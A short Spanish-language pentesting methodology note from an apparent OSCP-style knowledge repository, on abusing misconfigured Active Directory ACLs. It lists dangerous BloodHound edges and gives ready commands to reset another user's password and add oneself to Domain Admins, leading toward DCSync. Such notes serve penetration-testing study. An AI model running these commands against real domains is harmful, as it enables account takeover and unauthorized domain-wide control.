JARVIS/nucleo/saber/conocimiento/05 - Active Directory/ACL abuses.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

981 B

ACL abuses

Permisos mal configurados sobre objetos de AD que te dejan escalar. BloodHound te los pinta como aristas. Camino de Active Directory.

Las aristas peligrosas

GenericAll          → control total sobre el objeto
WriteDACL           → te das a ti mismo cualquier permiso
AddMember           → te metes en un grupo (ej. Domain Admins)
ForceChangePassword → cambias la pass de otro usuario sin saber la actual
GenericWrite        → modificar atributos (ej. añadir SPN → Kerberoasting dirigido)

Explotación típica (con bloodyAD / PowerView / impacket)

# ForceChangePassword:
net rpc password "victima" "NuevaPass123!" -U "dominio/yo%mipass" -S DC_IP
# AddMember a un grupo:
bloodyAD -d corp.local -u yo -p pass --host DC add groupMember "Domain Admins" yo

Encadenado

Una arista lleva a otra → BloodHound calcula el camino hasta Domain Admins → puede acabar en DCSync.

Relacionado: BloodHound · LAPS · OSCP MOC